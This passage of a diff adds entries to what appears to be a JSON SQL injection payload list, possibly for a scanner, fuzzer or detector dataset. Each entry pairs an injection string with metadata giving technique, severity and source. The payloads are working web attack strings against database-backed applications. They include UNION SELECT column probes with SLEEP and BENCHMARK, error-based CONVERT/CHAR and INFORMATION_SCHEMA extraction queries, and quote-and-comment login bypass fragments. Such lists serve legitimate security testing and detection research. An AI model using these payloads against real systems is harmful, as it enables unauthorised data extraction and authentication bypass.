@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT NULL#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT NULL", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "type_conversion", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "generic", + "severity": "high", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL--", + "category": "sqli", + "metadata": { + "type": "union_based", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Generic_UnionSelect" + } + }, + { + "payload": "==", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "=", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' --", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' #", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' –", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "'--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "'/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "'#", + "category": "sqli", + "metadata": { + "type": 